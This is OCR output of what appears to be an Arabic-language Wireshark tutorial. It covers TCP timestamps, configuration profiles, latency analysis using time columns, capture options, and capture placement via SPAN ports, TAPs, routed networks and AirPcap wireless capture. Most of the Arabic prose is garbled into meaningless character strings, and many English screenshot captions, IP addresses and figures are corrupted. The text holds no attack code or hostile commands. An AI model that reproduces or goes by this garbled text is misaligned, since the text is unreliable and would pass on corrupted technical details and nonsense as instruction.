^il liA .U^ii* TCP l£ J ^j 31 l>-^ TCP ^] :Calculate conversation timestamps 

ttaU-a J ^LJI JiVI j! ^1 j TCP J jVl jU»yi lh»^ c> (Timestamp) J-jM ^UJI ^ J j^ll 

.^jaJl J^a^ * J TCP U^J^ J] >° J* ^) (J^j (43 4^1^ VI ^ UJ^ ^ ^ .^J TCP 



n [Tirrtes tamps J 



[Time since first frame in this TCP stream: 1.6l9S9uOOO seconds] 
[Time since previous frame in this TCP stream: CKOQ12GS0GO seconds] 

(Profiles) ^jUi Jj) jll Q nunY\ ± 

,4qV^ a\\ £A\\a*\\ ciljLuo jjI jll <i^aila dibl^cl ^JJJ CjLa^J ,A£jjolil JjuJI L-lUl 

aIo tiljUjj ^jjI jll <iajaj| \ $ Ij^vi ^ Jill ^c^ll daliLa j tiljLuj ^jjI jll CjI^I^cI cs - ^ ^> a (Jjj^jjVI J Profiles 
J^- ls J^i. & "security profile" ^ jLlJI j£ jj Profile ^» 4 JliJI lW^ ^ .Profile l£ J 

kLujJ Jll <jJjl2ll ^IjSj (^1 jaJl (Jj^) ^XixJl oUJl J jJjoiJ Jll jL^ajVI diV jU^ jt ICMP JJJ* ^J^- lP 3 ^ J^ 

,<a j^>x>Jl CjI auj jjll Jc ^5 jll ^-A jJjouJI Cjl^^pJl Jc ^ JJ^all 

: JVl g£2 Profile ^ f Ufif 
Profile ^UijV New j ( : Sj ju ^j 3 ^ ^-6^ j 3 ^ cJ^J J j^) ^^J^ -^j^ 1 J Profile ^ j*^ J^ c>^^^ j j^W 

cSaacVI j t^jjjlill ^cl j t^pa^xll jj^li djbl^cl tialiiilVI Cjbl^cl ^Iloj .Troubleshooting ^ ^ * > ^ j 

f3 Edit .Troubleshooting profile ^ J J 3 ^ j Preference ^bl^jj 

.Liajl 11a pbV Configuration Profiles 



C&nft-g a rjtiorv P rofil*s.. 



j 



• Load timt; ," &0 Prol It I efau t L 



HI W Edrt. . 

Driete 

5- CK«Age 



J Jasu 11a UIHa J ^j^j j 4 JU3I JSjuJI J .<JLaJI -lajjj^ u-*^ ^ J Profile ^1 o^j^ ^ 

.Troubleshooting profile 



Source: 199.181.132 . Z50 tlSOsl" 132 . 250 
Destination: 24 + 6. 173. 220 (24.6.173.220) 



% $ I Timt tP Irvc fip-ttl), 1 byte P-JCfcfe <«K> Ditpla/wJ: ^QO M Q lot* tiirtfr CjOOJI 
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a ]~iUi))\\ 4us>\\\ cAiLJI (j-a <c ^ ^jc 6jUc j& Profiles !^-^ j?^^ 
Profile N V * <JaLunj ttiljUj jjI jll j^.1 < aj > ^ profile <J^ j» J s-^j^ '"^ bj .^^lli j-^j 'il^j^ j^j 

>c $>Vl cLlj^I (Profile ^ J jO 
(Locate Key Wireshark Configuration Files) jjIjII ^1 <-*l* c^i* fi-*>* ^ 
^UJI ^tacVI (global configuration directory) ^ ^l^c-VI :o^i* J ^J^> jj'jU ^bl^j o^j^ {4* 
4£ jLi* jl <c j^uj Cjbl^VI j^j (> t«S jjI jll Cjbl^l ojj^j jSUt 4i j*^ .(personal configuration directories) 

.CSJ^VI tiljl^i jjI jll 4_xdaj| jl (jJJ^I (j-aLaJj) 4-pjall dibl^VI 

;tiljUi jjI jll J jLjouJ! ^IjjI J!^lk ^ diULall l£LgI 4ij*_* o^jj J^ir-uull 4-<Jaj| l-lu^ Jc t allkj ciilal*!! <j£Lal 
Help I About Wireshark I Folders 



Abewt tttiwhark 



VA,«h„* j *««r, MugiB , I U<-M , 

fcSflm* * folder 
f ilc - -clings CA^a^ir^vrgVp^^yim^nt^^p - Wrr^hjtfc Mmv^rry^oy frpi^g - frwq"^ Etf^"?"Vr< 

T cm Z C:\ U 5*r s\JLa u r*\A pp Da t *' ■■ c * l\ T trwi 



Glub^l tiinfiquf jLion C :\F regain F ilcT;'.'.Viresft^rlk 

v.^t*m ^^rqg^rr. F il^,Wir^hf rfc 

Program C^Proo/am F.lgn\Wiraharfc 

Persons! Pk^gins C^llMrALauraVjlxraDar^F^mirt^ 

£lob*1 Ptvgins Cf ■.Program Fjl«\Wirrih-Brk , ».plv pm^-l^fr 2 

Geoff path O'ln-i^mi^ij 



* L 



Select Hefp ] About Wireshark j Folders 
to locate Global and Personal 
Configuration folders 



3 



(fUll jI^VI ^) Global Configuration Directory - 
;t aUi b& U^j^ cs^ CjULJU <UjUs Jj Uua .^1jL5j jjI jll Aj.JaljjflVl djbl^c-VI Jc; b^ j!^c-VI aL c5ji^ 
Preferences ^ contains the settings defined when you select Edit I Preferences 
Dfilters -> contains the display filters for a profile. 
Cfilters -> contains the capture filters for a profile. 
Colorfilters -> contains the coloring rules for a profile. 
Recent -> contains miscellaneous settings 

(c s > ^ > ^l^tVI ^V*) Personal Configuration Directory 

.Ubl^&l fj* jl ^jjJaljjaVI jjuj Profile ^ ^j 1 ^ 
(Configure Time Columns to Spot Latency Problems) *U2atf I j£Ui4 ^ ^Sjlt Jl^t Jr- 
(jiasu Ixjb c^IUa j jll jhnjj ( . ilSall c fljjja^H cJ^jj L^llft -c ^i<ijll j^Ull ^j^jI ^^aJLujj (JjjULj jA (^jjx^ll/^-lilkVl) Latency 

.Ajl^ill ^ ji (jjjlall Jjla ^ lS^^ ^ Latency uj^ .Latency 
Latency c> £) j$ c> lA^II (Info column) jkJI j j*^ j (Time column) ciiajll ^ j^ ^l^ki^l jSaj 

Path latency, client latency, and server latency 

(Path Latency) jU^aII ^ liill cjIj^j^ 
0- jjSS UsV [round trip time (RTT) latency] (RTT) s^V 1 j ^Uill ^ j j^ U blli, p a th latency 

dul£ lij c— '^j^ j*^^ cs 6 j'j^' jW^ l!^ 0 tA-naal) ^3^' ji Path latency * a u " uj^ 

t4_illc ^Jjljl JJJ^ ^^>^ ^1^-^- (j -0 (3^^ L$'^\ L " ^ J ? ^ ^ J (J^^ 4_jJaikl<i ^Jjljl ^ <j^aLkll Jj^ll ^^>^- 

.Ulxll AjjljVl tlib JJ><JI 4-^^ LoiiJ jllajjVI <-ajIS J j^' ;v; ^ JJ><JI 
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_a£jj^3I Jc jjII jjlkJ! jc J jUlkl c*lL& jl t junj jj^j ^1 j jaJI jl^a j& Path latency s-^ uj^ u' u^J 

^ilal jk j-a clfcf^ -laJJ l!^ CijUl a>Jx 10 J dujl dili ft^l j <J;JJ JL^jVL Cl ba3 lil 6<JHa]| cJ^f^ cs^ 0 

,<La^ ^ jja ji. £a c 1 1 X Jl Uia. oUaII 

U£ t^Jaj^j TCP three-way handshake i> o^j^ Jjt J j^dl t> Path latency lsj^ u' 4t*ljL5 jjIjII J 
j^j diS jll j>» ^£ .^iLJ! Jl SYN J^jk (*J^ cJ^*-^ ^^aLuLgj lS^*-^ (j -0 ^hj^^ -^-^Vl 4_iLac ^jj . <J£juJI J j& 
.f^l I^A J Path latency i> J^ c# j 1 ^ J^ J ^ ?SYN-ACK 



SYM 



SYN, 'ACK 



E 



(Client Latency) d***JI f ^W^b ^0A>* - 
linkillj o-i ^vim^ l Client Latency ^j^ uj^ 



<>" yr*^ (Latency) uj^ ^ j'j* j' 

j£3 j .cilli JU^. <J <»L^ 1 aJ J^&ll tilliA jjjJ j£3 j '(^-^ *L^abk]l Jc La ^(^j Jc- jUl ^iklaixJl jUalil lie. " jLujVI 

. cjllnki *.k> <^U3I (Client Latency Problem) uj^ l£LL« <>- ^ 

Jc <J-<^Jl dilaJilajH a £jJaJ L_ Ll^ . jLl^VI J L^VI Jf^ I^A ^(^LaJl j cJ^ 1 *-^ 6 jL.ua] 1) ftjj^AxJl Aj!>Ij3I j^<^3l <j£Loui 

c_ijjudj jj^ull J^W^) J^J^ j>» j;i£ j^-L ^jj Lo^jc Client Latency Cf- <— ft^Sl) ^ 4ti]jLi jj! jl! ^ . J^x-Si 

.^Lll j£Jo3l jjlfa La£ t(^,^ nn^l dj^lclij 



ACK 




DATA 



REQUEST 



QUICK ACK AND 
SLOW REQUEST 



(Server Latency) f li^l ^U^lj cjIj^j^ 

j 11a c_ijjoj jl .s^ jl jll CjLiyi UJaj ^^UJI j j jjSj ^-j^j Server Latency 

,^LkJl J j^j J^-L J^.li3l jkl ^ jj ^5! jl a^LoaVl CjLg jls^ ^gic <J j> jkl ^a^lA ^ jjLaLill ClA ALalLa ^nJalli t^LJl 

t^^UJI ^ (yj^J^ ACK j <^laJI J^*^ ft^Lld J^U. ^ Server Latency 1 v^^j tciljLi jjI jll J 



«U.o 



REQUEST 



ACK 



QUICK ACK AN 
SLOW RESPONSE 



RESPONSE 



JjWI (Latency Problems) 0^ 
ii« ja ^1 jjaVI (Time Column) ci^jll ^1^1 :(Time Column) cjUIjp) jj*j jjjla ^ - 

J jVl -UjaJ! Asu -Uja. ^J^l ^ <-ajS .0.000000000 ^ ^ J jl ^jWli c!ljLi jj| jll ^jL c-ua .JalSjlVI aJ-^ ^I^j 
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View I Time Display Format I Seconds since Previous Displayed Packet 

<UDP / TCP dj^U^I ^ ^jAxJI Ai^ l^j J <£f^ c fll* yi S^l j 4jjLa-a ciL^ (jj^J fO^r. l_j jLojVI 

.JSLUI ^jl^ Seconds since Previous Displayed Packet J* 
^Calculate conversation timestamps TCP c> :^^TCP Delta ^ t^ll^t Jjjla £p> 

Time since previous frame in this TCP stream <°L±\ <>j ^ U£ Preference 
.Apply as Column W 1 ^ jfr^j iW^ jjh ^ <ij* ^ .f * j?* 





E*^i*ISiilrfcM*t 








Expand All 

r *'irir"» A 'i 












E. > £dH i5pt W finafyr* StatLflw:* Tdflf 


AppTv as-Fiftcr 




si * a & * ^ e k ai a n + 


frttpire a Fitter * 






FsMo*TCP^«™i 




Klo. Tune Sown;* DmIi 

6 0,2263SS ISO. 101,135 . 12 24 


F C«¥w MOP Str*#m 
FpUqw SSL "Stream 


Time- sifKC- prtvii?^f IfflfM >n. |hij. 1 

O.2263&S00O 




7 0.000176 24.6.173.220 1S( 


Copy * 


0.000176000 




S 0,001193 24,6.173.220 15< 




9 0 001193000 




9 0.19 32S6 150,101*135,12 24 


\J FifttffieWficfitrwe 


0.1S32S6O0O 




10 0. 001019 150.101.135.12 24 


4 0.001019000 






r CfcL"!"!- 1 rH'^J 






* Options: (12 bytes) 1 Maxiitiur 

* [seq/ack analysis] 


PneteeofPfif Office* * 
D«od«Aj... 


oration (nop) 1 No-i 




[Timestamps] 
Crime* since first frame in 




26 38 &0 00 seconds] 




[Time since previous frame 




0.2 2633SO0O seconq 


: 




i 




9 Ti to defti Ircm p«.., P*cVete rTiSS D^piaye* 174*3 hbtkta. 0 lea* inrr.s OfDljOTO 


P*«fik: *ircsharid0l 





.ico file requests 
SYN packets 

FIN, FIN/ACK, RST, or RST/ACK 

GET requests. 

DNS queries 

TLSvl encrypted alerts 
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Determine the Best Capture Method and Apply Capture Filters 

Capture Options 

Capture I Options 



Capture 
Ca^lurt 



Interface Link- layer 

WrFc*<» USB wireterc captor* *S„. &JZ-1 L plus 



Nm. Mode SftipJcn DM Eufler ;MB) Capture: Filter 

header enable** default 1 




Capture on al* ir.l*rtac cs 

.'<] Capture aft «n puwrirtcuciui mode 
C jpturt Filf-;-; 



ffl Use in»***;fH« 
ffl Hcxtlilcvwy 

J Rmg buffer ivrfh 

S3op Captur* ... j^fr 
_ after 



V U-:r pcap-ngj format 


100 V 




1 |j 




5 | 


fil= t 


J. 



Q -aftef 



jr- jminute[sj 



3 



iljriMelisUrf partettmraaltime 
SI iirtomadc scrolling in !>■-£ capture 

V. Hrdt: -capture irtf-fr dialog 
Name-FLc-^olutic-n 
V Enahk MAC nprvn rcseSirtion 

Enable ivcty^ort name eesoSuljtoo 
v Enable iiaawporlnaniiefesolution 



I Capturing (n>m R**Jl*fc Ptle F£ Fsrrriy Control \Do^*\NPF_(6-f 79FEC&-FF79 -4970-«£4-eE Ff 30OA9B9F j 



file £drt Jfiew Qo Capture £na4yze Statistics Telephony Teds Externals Help 

iiiftt t-: je s a 



jlii^l c> L5^'j i> jj^^ ^ -^^^ cr^^ ^f^i s ^ :(i) Interface List 

.(multi-adapter capture) ^f^t Sj^l c> jl 
^L^j jl <Jljj J Uj^> IjSj j^j) AiikJl (Capture Filters) J^isavi j£« o^j*i :(2) Capture Filter - 

B S^*JI jl aJ^JI ^1 a£j^3I cjI^I j ajIc ji^U ;(3) Manage Interfaces 

U3I JalSilVI j] Uajj^ ^jja jj 6 ring buffer £^ jj djUL iai^ ^i^^j aI^Ll ;(4) Capture File(s) 

.JalSsIVI £c> ^>JI j auto-scroll c> *^Sa3 :(5) Display Options - 

j\ A^ubtftW cjULiJI <;L<^ ,(*j^l cf-^* I iali^Vl ajIac c-ilij] JajJj ^jja jl - iklujj ;(6) Stop Capture 

j IP u^j^ j MAC u^j^ <^u3U pU^Vl <^ jj Jj*^ jl c> :(7) Name Resolution 

.jjj! jj^j fj j^Vl cjVUJI ^ Ul .JaliilVI <^ 1^3 :(8) Green Wireshark Icon - 

(Capture Traffic) JalSSNI ^ J^St «t 

U jjib j cAiLUJi cjUU^jojVI t^jaJI £)\& 'round trip latency times ^V^^j .c ^jja^H jJaj 4^ j j^ jjj^I 
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(j* s-bVl <J£Lj1x» (_£JJ (jl -JJJJ tdjli 4 JjJJ^lVI ^}J^ <-S^J^ <J f ^'^"^ ^^Ajoil lil ^L-fljjJa^J! 4_La J^ J^ cffi-^^ L>* 

l^ja ^jj Jll 3 Lalll ^ JaliSlVI 1 g ^ t^L <j-aUJI ^ j^JI latijll sbi jti *K^t < »^ru J U jl£* J latijlVI <jL^ duli bj jkj 

.cjVL^VI J *bVl J ^ 




Start capturing as close as 

possible to the 
complaining/suspect host 



Jj <j^aLaJI JalSllI &bl <J^ '^J^' ( ♦ ^ J 6 J^A? L_flJjJaxJl jiaJ (j-a W J &J^ Jc- <J J 1 ^aJI .J*J 

iilj^J (J) ,jjjj dljli t^-bVl 1 to > ^> 1 ; Ujuj <j1 J.JJJ L^ 1 ^ llA^ 6 lS^-^ J^f^ J^ .AitLi^a jlaj j Jc- <J jj^^J] jkj 

^ a ^ j^JI ^cjja l£ j^j .Jj.j^i3 jj jl jil s j> (J^jjuJI ^ j^-VI < ; uLaJl Jc- ( J^II ciljUj jj! j ^Uaj <L*tal jl) Wireshark 

.(interconnecting devices) Jajjll J j^Vl <*>JI 

(Capture Traffic on Your Ethernet Network) 4? tiM t> ****** JJ>* **J* * 

<JUi jjSV) 4-J jl^Vl laJLml jbuJa J tibc-LuiJ tilil jlrk Aijx-a .Ethernet J^ JJJ-^' JaliSlV <JJ^ l>* 

; Jtill Jl^l J l^Ja JC 3 1 Cjljlrk .( qj>h^l <> C_jjji3l JalijlV ^jb^ ciL^ . JJJ**' iallilV 




(Capture directly on the complaining host) < J^ S^iUj JalHWt :1 jUaJI .1 

jl£ lil .Portable Wireshark ^l^i^l jl < <j>^^t liA J^ ^>JI JalSjII ^1 jj Cjjjjjj t*U U JS lil J^al 

.TCPDUMP Vijnii ^ Jalisll fi!^! .tSljLS jj! j3! c^jjjj] <j^^J! ^ 

(Span the host's switch port) cA>^l uL^aJI liL* jUjaI \2 jUaJI .2 

^jijjjjjuJI ^l^cl J jlajlUa t^jijjjjjuJI 11a ^l^cl J (3^^ u^j (port spanning) -^1*31 ^1^1 ^c->jj - v^i..^i ^jiiLjjuJI ^JS lit 

.^bVI e jjudj 4ilxi<JI 4£jaJI J£ ^jj* VI <jc ^tjjj ^illj (data link-layer) -^-^j^n <Lia ^ ^Lk^l jh ^jij <jl aJI^JI J 

Test Access Port (TAP) JU*1^I :3 jb^t .3 
TAPs 'b^al jjfll -L )iHjj^J!j c> a^ja^» jjj jLolJI J <suJaj ^jj ^illj (Full-duplex) ^UJVI jUij jl^j> ja TAP 

q\ ft jll ^ .(Data link layer errors) ^AjUjI! aIjL ^U^kl t*Bi J Uj t^UVI Jl a£j^JI jjj^ a£j^ lS^ ^j^* J^ lUs 
.t fljjja^aH ^ jl Jj jjj^JI a^j^ Jj ^U»jjujVI J t_jc. jj djj^ bj iiixJI (jj^j jl U^!^ tc uj^ u' TAPs 

ciajLaJU ^jJa jj jll Aj\x1\ (jjoij J - - aJ jJ^iLo (J-axJ jSj tiljj 6J^i3l . . . ^J^-^ I^J-ujJ ^J^J 4_LaC jj^ £j]ajjuij ^3 jl^-aJI b^ 
j\ jjjjjjjuollj Ldj 4-LaJjJ ^IjIIj 4<jSI jxJI ^jjj jlg-^Jl J <JaJjJ JjVl tJa^a jj^iLd Jc ^5 jj^J AjIxJI 
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^ J*- Physical Access o& u) l$ j^) ^ ^ j*i u' o 3 ^ y^Wj ■ ■ ■ * J^W^ Gateway jA* 



{Optics 



Network 




Monitor 
1 2 



PortAgg 



■ 





u 



» ACT LINK M 



regator \ 



qii jj^ll ^ ( "u^inU (full-duplex) ^UjVI a^US (half-duplex) aj^lJ cA£±^ ^ l^l^k^l jSaj 

^ l$*jaj ^ passive* j^i ^ TAP jjjIjIIj J^JI o£ j' o^j^JIj J^*ii) jjjIj1I/<j&jj*JIj ^UJI/J^JI 

jl^ J\ (CRC *U*aJ J^) ^j^ll *U*aJ ij yr^ ^ J 3 TAP j*^ 1 (l£j^ c^) ^J"Vl 



Before 




Switch 



The passive Tap creates a permaner 
access port to monitor full -duplex t 




Firewall 



Th« 
so t 
the 




The network signal is either split or regenerate* 
so that the monitoring device has full access to 
the signal. 



Firewall 




onitoring device sees the same traffic 
i also in line, including physical layer < 



rf 

errors. 




Collector 



HOST TAP A TAP B HOST 
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Non-Aggregating Taps • 




tiljLJj jj! jll J-*^ ls'^ jW^' .Al^aiixJI iflliftll ^ o£ [Full-Duplex] ^L^jVI ^ >J1 djVU^ajVI jjj-^ 
ialijlV ciljUi jjI jll jl^cl ^Iloj j . [Monitor Port]^-^j-^ ^-^jj^ l>* jjj^ <£f^l CjtaLkj jjjjI < ; iILjj 

.{Monitor Port] ^ jj^l Cy* o0 J) U-^ 3 o^J ^ jfi J ^j& ] <L^aal^ l Sj^VI jjjjI ^l^klaal ^jl^ j^Vl l_uUJI 

.mergecap j*Vl ji File I Merge fl^U (Jjj^ j& f*?^ ^ o^l* ^ ^ ^? ^ 
[Monitor Port] ^ ^ jjj i> u^' c> jjj-^' ^£ J) ^f^> csj-^ ^ j ^ :4JajalA 

£jUaJt J -k^Xa j^b L_fl jjuoS USb ^ djUilkJl I^A ±J\ jl£ lilj 2<^t ^UaJ JjJ ^^jll £jlkll L^^llkVI I ji^ (j^ 




^ J-jc- [monitor ports] £ j*^' u' i> ^ o^j <iA^I ^ c^*^ ^ jjj*^' o£ 

,^LaJl ^ jill (JJ>^C Jc 6^.1 j <£jjui <aUaJj ^.1 j tiljLai jjI j J] ^"ll^J L_fl jjuj TAP ^ ^ .4£jjoJI CjlaUaJ (j-G 

Regenerating Taps • 




JNfet O-J? iritis JO <_j, j^cn &irf J^e^e-pj^ rdTf a"L3« Ttip f " >f tj ^ f ejp f - e ^r.s . 4." u ■r?^ J f 
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J tT<< Iajj 4<JH<Jl J-IJjuo Jc „ JJJ-all ^J^> J] ^ <Ujai^U/Clb gaUl] 6^.1 j ^-aj ftl^l j5£l t^L^l UJ^ ^-^C- ~ iklLujJ 

Suricata jl (www.snort.org) Snort JS* us j^> sbl ^ JLull *l jajj t*S jUi jjIj jj^ll 
jll a j^l jl) jjjjI JL^j^U ^xuoij j (> jSSI £ jaJI Iftia I^jJ (www.openinfosecfoundation.org) 




WiresKark Snort S-iUl riC^TSi 



Link Aggregation Taps • 

J]j JJ^>^ ^Jfll j* J 4-^ Cl u£ lil 4<JHall cJ^f^ Jc- . JJJ*^ ^^P" ^Jfllj-al j -^lj j-* J^l UJ-^ ^-^c- ^^uin 

.^1 y&l ^1 j link aggregation tap ^v^n" jl TAP ^l^l^l c> ^ .<L^aiiall ^\ j-* q±&\ 

Intelligent Taps • 

<il3i jii£l j ^» j^JI ^^O^ £^ j jj^>^ ^^>^ lA-*^ t — ^j^j^ il^j) J s-l^ilL 

djUj tdjU jlatJI ^ j«J TAPS J ^llc ^j^ Net Optics . J jl^JI J^ &ja jlall CjI JjaII 

www . netoptic s . com 
Analyzer Agents • 

t> t> ^ switches J^ <L^j ^Ujj j& 6J Lc j distributed analyzers <L^I jj 

. JjJ-all 4^J^> Sjl^) (j-a c*1j£ aJ /DjbVl Jl CjUUJI (JLujjIj djljjjJl/iaLL<Jl 

Spanning VLANs • 

<4tt ^ ^VLAN J * c> jt cjliaiill SPAN lU^ <>. Cil&tiJI Jl ^Ui^U SPAN J TAP t> l£ 
jjI jll ^l^cj t VLAN l£ u' J?-' c> J^ 1 j^'j^ ^ (destination port) ^ jjj 

.VLAN ^JJ J^ UJ^ ^ (jLdjJa V (j^J J VLAN ^^acl jAjJa jjJax£ ^pJJjjaJl Jl jA\ tiljLai 



Analyze Routed Networks • 

^.Ij t . ul ^ Jc. tiljLui jjI jll ^jJa cIlqS lijj.IP a£^juJI (JjjUc Jl bUlojl a£jjoJI djlia^j Jj^a Jc jjjI^JI ^^-^■^ 

.4£jJa3l tiliS ^ ^L»^lall jl Jl <fr^lall dlia^ill laaa ^IJjj jjuj tiljli jjjI jll j^l c>» 
^Ijillj J^ll Sj^i ^ISlsslI .(Subnetted 255.255.0.0j *10.3.0.0j 10.2.0.0j 10.1.0.0) c> uj^ J^ J^l 
.10.2.0.0 <^ J^j-W [wireshark #2] ^ j^ ^j^ uj^ o 3 j 10.1.0.0 J^ uj^ ^ 



Network I.O-LO.O 



I 
I 



Router A 



Network 
10.3.0.0 



I 
I 
I 



Network 10.2.0,0 




Switch C 



Client A Che nt B Client 









1 , 







Server B- 



Wkeshsrk #2 
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[router A] a uj& u'^ ^ JJ SPAN i> *^j ^ [Wireshark #1] 

. 10.2.0.0 4^ j C j B j A j>U^ J* j t> J\ £^VI c> [Wireshark #1] ^Jj^ j^l jll l£*j 

^ill j Switch C j server B o£ J^l jll JaaJI J ls^I j aggregation TAP c> ^l^j ^ [Wireshark #2] 
.Server B and the local and remote networks JLs i> *^ll cASiti <jjj <> jjIjII ^jSai 

(Capture Traffic on Your Wireless Network) 4Ai«£UI jjj^II <Sj* JaUftll J_ 

jjixl! J cilj^Lai^ Jc Ljajl Jaxjj (<Lj£lui!>Ut alt CjI£^uJ1) 4j£Li!>UI CjKjhiII <J*c Jc^ cil^Laaj jl jjI jll 

J j^« ^J^J i J jVl .WLAN J^ JalSSlV ^(j^l (> jjc .lW ^f^> ji ^ jlft J ^bVl < axjJa tjim Jc 

B t*SjL5 jjI jll J^j *UjI *l J J J 31 4> J^ 1 WLAN 

?WLAN *l jj <^sJ ci^t u - 
J ^ ja. tiL (j-^alaJl AjaXoa^Ul a£jJo3I <jl£ lij ^j^aal Interface ^ j ^-^j^ <LajUlt ^ Capture 
*^ <O^H <Lajta J o^j J^ftlVI ^jUtj ^jjILj db<»a lij .V ^1 tiljUi jjI jJI J!)tk 4£jJoll jjj-* 4-^j^ ^jj a ^ ci^j Interface 
J j .tSljLS jj! jll V ciL (j-aUJI AjiLa^U) a£jj^3I Cjj\£ jl ^^jju jj>* ^j^- <^ c*ta£tj ^c. jll Jc^ ^ j»JI ^1 

AjaLjaVl dlLa jlx-all (J^asu t flJjJaJ V jfl <j£l j JJJ-^i ^J^- C5J^J ^J^j J^i ^ (j-alaJl 4j^\ui^Ul <£jjuJl Clljl£ ^O^J jUa.Vl (J^H 

J ^Ult j>» jl ^^j^j WLAN ^ 2j<^nu Ky'iM cjV j£ jjjjj Jj J^j ^U3I ^ k£U^\l\ *<y*\\ JjU-; ^ 
-t *Uij 4u^»UJ| djliUajj (RF (Radio Frequency))^l^^l j^ *^ j^VI *^ lSJ^ WLAN ^ 
. J£UUI ^j^j] spectrum analyzer f^-^ ^UJI ^U^j^^ j^RF unmodulated SjS ^^j* jSaj V ^jUi jjIjII 

^ .^W^ j spectrum analyzer ^ij^ j>» <S jUjujU ojli^ ^UjU MetaGeek ^ >^ ^ 

■ www.metageek.net ^jUj ^jj ^cjUjkJI 



IZZI 




Wi re sha rk CI i#nt C 



Pfdict' i-Vrrc-s^rrtrA: cfose j^o client to nnalyjze traffic JY&rrs the client 's perspective 

m k£LA\ A£fxi3l J <*i ^ Jj 4^jUl<i 4_^Loj^UI ^<;^ Jc; ^IjLSj jjIjII 

4i£-dJ ^^jll CjUj^sijII ^jiasuj WLAN ^UaJ 4j^3 jj^J <J» ^IjUjj jjI jll cJ-^^ jj;^^ jW^ 1 UJ^ L . WLAN a< \ u * (JjI^j] 

.monitor modej promiscuous mode u^-^j^^ <^ lUI*^I c> 
dilia^iH JalSslI ^ -La^t jjj WLAN AiUaj ^j^j promiscuous mode u^^^ u^*-^ ^ 

<!!>Lk ^ja jl j-d ^<»J ( j3l j^Jl 6^-ljij <£jjuoll dijl^l ^-«ft.t.»J j^l ^"it a) Ja^a J^xJl jl^aJI (J^J ^f^^ ^3^^*^^ 

jj^j jll ^j^Jl laaa JaSjL 802.1 1 J Monitor mode uj^ j^^ ^ ^^kiujl lijj . ...V J a! <^ dul£ *l jjuj 

^1 jjoj A£jjoJI AiUaJ <iajoj| jj 1 ^L^aaJ jll JJ^>^^ ^^>^ JalSjll ci^-l (j^ J .^J^ A ^" Ui \^ J SSID <J ^ > jTi A£jjoJI Jc I^jojI 

jli ^ jll liA J t [rfmon modepW ^^£5 jll " Monitor mode" ^ ^ J <^3I <aUaj ^ j t^uLL* jl jAlii 

.^jjaajjjuoll CjIc a j-<i <c j<^^ a ^\ J I j> >ir. <J j^-<JI l5*^j *^ [driver] <J j^ ^11 
.(^Jl i J jj^JVI ^j^JI ^ jSjV! ^L^) cjVUajVI ilui V iluill cj ji£ (Jl [monitor mode] ^l^l^l ^ j^Ia 
J jl djlui jj! jll J^u V j^i tit WinPcap ^-^t jj ^ jj V ^ 1^ j .fjaJ! ^^11 ^ ^>J) JUSIujI ^jjj 4iil j 

.djLi 
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Use an AirPcap Adapter for Full WLAN Visibility • 
AirPcap c> ^ t"\ * *>* j ^ jl^li) CACE <( j>ii>jil 4% ^ Lu^ Vj) ^ li$J I jtj 

.^.Ij dij ^ (*^Axi<i CjI jja ^UlUj) AirPcap 




Vie AirPcap adapter was designed for WLAN capture 

lij) WLAN ^ < WLANjjj*^ JaliiilV \ - ^ ^ AirPcap * - ^2 

3 LilLH djIjlLVI J ^ <ji^a jll cjUUJ! AiUblj ^(^^ 
1$U >W ^ cjV j^JI <t*Ui AiUbVU .CjUUJI cjIjILIj rfjblj ^ jVij..ilt 802.1 1 JaUBSt AirPcap j^J 
uj^ ^ JalSslI t> Jj^JI jSaj yr^j 6 Rfmon^j ji ajSL^UI cjbj Uiajl JAl? Monitor mode 
ia^a ^jjjJ j ^802.11 jjj^ AirPcap J Cy ls^*-£ ^ j J j ^Jaij ^ 



jlLI J£ JI RadioTap 



(Per-Packet Information) PPI H s^j^ AirPcap ^->Vj^ ^) 



^ jiabd j ftjL^yi s jS j t jUaVI aja cJj^ (Frequency) ^j3ll J 0 l£ j-^i jjj^ 6 ^ .WLAN 

Lp 3 ^*^ ■ AirPcapJ 3-lajuit 4 laliLlIl ^aJ £JJJ ( <lU cs^"^ (J^-^ JJ^^ .t^lSi (>a J tJalijlVI (jl^ j JalijlVI 3 J jjJall 

. RadioTapu^b J ^j' j^^ cjU jix-<JI J^a^ ^ ^ j^JI 

CjV J ^—j^ jix-^Jl .l&^VI j^JI AirPcap j^^^ ^ j<^^mu cjI^jJJI ^j^. JalislV Cu£ lij 

http://www.riverbed.com ftj^j j 'AirPcap 



|dif ^Irw £o ^-nplurt ^rwtyM- yjtirtk: Td^pttnriv Jpak- Jnremjk Help 

BWtttttl 0 JC «5 ^ * «» a p]s <a 



The AirPcap adapter can see 
&&2.11 control, management 
and data frames 



App1e_47: 33:97 



Ci sca-Li _dQ : 94 : c2 Appl e_47 : 33 : 97 



S02.ll 42 5 Probe Response, SN=2H 



302,11 145 Probe Request, SN=l99; 



Frame 1: 145 bytes on wire (HSC bnts) t 145 bytes captured (1160 bits 

Radiotap Header vO, Length 28 w^r "~v 

Header revision: 0 >T The AirPcap adapter can add a 

Header pad: 0 | Radiotap or PPI header whtch fncludes 

H eade r length: 2S metadata abo ui 8021 1 frames 

s Present flags ^ 

MAC timestarnp: 1696S5S50 

* Flags: 0x10 
Data Rate: 1.0 Mb/s 
Channel "Frequency: 2437 [EG 6] 

* Channel type: 602.11b (QxOOaO) 
SSI Si gnal : -59 dBm 
SSI Moise: -97 dBm 
signal Quality: 94 
Antenna: 0 
SSI Si gnal : 38 dB 

IEEE S02,ll Probe Request, Flags: c 

IEEE 302,11 wireless LAN management frame 



(Identify Active Interfaces) 4J^iU) <£^iJ) cjI^aIj jj^aj 4b 

.^^U (Jl^xi (jj^J jlin^ ^-^-^ J .I^^JjojJ L_fl jjoj 

cjIjjVi -Sajj^ ^ Interface j j ti> j> Interface ^ c>j ^^J^ i> Capture c3> ^ 
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l£ c> IPv6 t*U ^ jj! jll jti 4 (IPv6 j IPv4) (dual-stack host) ^ii^ lil 

^ jij j^j lt^^ J 4 Jtl<J! cJ^f*^ c^c- j uj 6 <J ^ IPv4 j^- <a^>*-<J IPv6 cs-^* .C5-^J-^ cJ^-^ J >^ 
j! jVI o^^xj ^jUjjI jlla lil . Atheros L1C PCI-E Ethernet Controller J jp^ o± IPv6 o\y& jftlb 

JalijJVt 4_iLo 4_ilo l_a jjoj ^1 .J j^aII li^J IPv4 



| Wi/*shafkr CapSu-re Interfaces 



Description 



Packets Packets s 



[ffl© AJtherc* LlC PCI-E Ethernet Oc-nBratar Z4£AG$.l3 *M 

O £S Microsoft f«BO:t3dOS*aaf*7da:«Bdb O 

O S Microsoft feM:rfd£7:5TO7:6iH&*cd 0 

O fiEl Microsoft f«e0::d0e2:reb*^?0S:7g3d 0 



0 



Pjrta.ls 



St* it 



